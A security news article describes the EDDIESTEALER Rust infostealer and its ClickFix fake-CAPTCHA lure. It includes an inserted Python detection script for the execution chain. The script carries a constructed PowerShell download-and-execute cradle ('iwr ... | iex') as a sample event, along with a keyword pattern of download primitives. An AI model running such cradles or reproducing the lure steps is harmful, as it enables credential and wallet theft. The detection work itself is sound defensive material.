A new malware campaign has been identified, distributing a sophisticated Rust-based information stealer named EDDIESTEALER. This malware takes advantage of the ClickFix social engineering tactic, which involves tricking users into interacting with fake CAPTCHA verification pages.

The campaign initiates when attackers compromise legitimate websites and inject malicious JavaScript that displays deceptive CAPTCHA checks. Users are prompted to validate their identity by executing a PowerShell script that installs the EDDIESTEALER malware, enabling it to collect sensitive information including credentials, browser data, and cryptocurrency wallet details.

Once the attack begins, it guides potential victims through a three-step process. First, they are instructed to open the Windows Run dialog, paste a command into it, and press Enter. This leads to the execution of a PowerShell command that downloads a secondary payload from an external server. The malicious JavaScript file is saved to the victim's Downloads folder and executed, ultimately fetching the EDDIESTEALER binary disguised with a random file name.
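Detection logic for the execution chain described above, added here as an illustrative example and not part of the original article. It runs over constructed Sysmon-style process-creation events (every path, URL and command is made up) and flags the two observable steps of the chain: a PowerShell download cradle spawned from the Run dialog, which Windows launches as a child of explorer.exe, and a script host executing a .js file from the Downloads folder.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 style records (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/x | iex"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\Downloads\stage2.js"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"parent": r"C:\Program Files\VSCode\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-ChildItem"},
]

# Common PowerShell download/execute primitives seen in copy-paste lures.
CRADLE = re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|"
                    r"curl|wget|iex|invoke-expression|start-bitstransfer)\b")
# A script file launched straight out of the user's Downloads folder.
DOWNLOADS_SCRIPT = re.compile(r"(?i)\\Downloads\\[^\s\"']+\.(js|jse|vbs|hta)\b")


def classify(event):
    """Return the names of the ClickFix-style rules this event matches."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    cmd = event["cmdline"]
    hits = []
    # Step 1: a command pasted into the Run dialog runs as a child of
    # explorer.exe; a download cradle in that position is rare in normal use.
    if (parent == "explorer.exe" and image in ("powershell.exe", "pwsh.exe")
            and CRADLE.search(cmd)):
        hits.append("run_dialog_powershell_cradle")
    # Step 2: the fetched JavaScript stage is run by a script host from Downloads.
    if image in ("wscript.exe", "cscript.exe") and DOWNLOADS_SCRIPT.search(cmd):
        hits.append("script_host_from_downloads")
    return hits


def scan(events):
    """Yield (event index, rule name) for every matching event."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

During incident response, the pasted command also survives in the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which corroborates the process-tree evidence.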

EDDIESTEALER functions as a commodity stealer, capable of harvesting metadata from systems, receiving commands from a command-and-control (C2) server, and extracting valuable user information from infected devices. Its targets include browser profiles, FTP clients, password managers, and messaging applications. The malware employs advanced techniques for data exfiltration, including encryption and custom WinAPI calls to interact with system files.

In a similar vein to other malware, EDDIESTEALER incorporates methods for self-defense, such as checking its execution environment to avoid detection and potentially deleting itself if it recognizes sandboxed settings. It also has the capability to bypass app-bound encryption in Chromium browsers to access unencrypted data like cookies, utilizing a Rust version of the open-source tool ChromeKatz for this purpose.

A noteworthy aspect of EDDIESTEALER is its ability to spawn a new browser instance in a hidden manner. If the targeted browser isn’t running, it can open it off-screen to facilitate memory extraction of sensitive credentials without the user’s knowledge.

Recent improvements to the malware have introduced features for broader data collection, such as acquiring system performance details and automatically sending host data to its C2 server before any commands are received. Client-server communication is protected with a hardcoded encryption key, which further helps the malware evade detection.

This emerging malware trend parallels broader campaigns exploiting ClickFix techniques across multiple platforms, with threat actors employing a variety of methods to extract and exfiltrate user data from both macOS and mobile devices. The increasing sophistication of these attacks underlines the ongoing challenge cybersecurity professionals face in combating evolving threats in the digital landscape.
